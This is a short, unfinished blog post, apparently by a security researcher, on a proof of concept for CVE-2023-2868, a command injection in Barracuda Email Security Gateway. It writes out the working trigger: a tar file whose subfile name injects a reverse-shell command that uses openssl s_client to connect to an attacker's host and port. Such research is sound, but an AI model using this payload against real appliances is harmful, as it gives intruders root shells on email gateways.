Some of my past research work involved crafting one of the first public proof of concepts for CVE-2023-2868, a command injection vulnerability in Barracuda’s Email Security Gateway appliance. My writeup can be found on AttackerKB, and my original ruby PoC code can be found here.
CVE-2023-2868 is a command injection vulnerability in Barracuda ESG’s custom wrapper for amavisd. A .tar file in the following format would trigger RCE:
randomLetters.tar < - name of the tar file
- `setsid sh -c "mkfifo /tmp/p;sh -i </tmp/p 2>&1|openssl s_client -quiet -connect #{LHOST}:#{LPORT} >/tmp/p 2>/dev/null;rm /tmp/p"`
^ The filename of a subfile within the tar file; subfile contents are random.
This is a reconstruction of the details hinted at in Mandiant’s Blog, and works exactly as-is.
The vulnerability was patched in updates following the aforementioned blogs. However, for those who have an ESG appliance on their kitchen counter (lacking said security patches), CVE-2023-2868 can be used to get a root shell for further research. This post will explore that opportunity.
WIP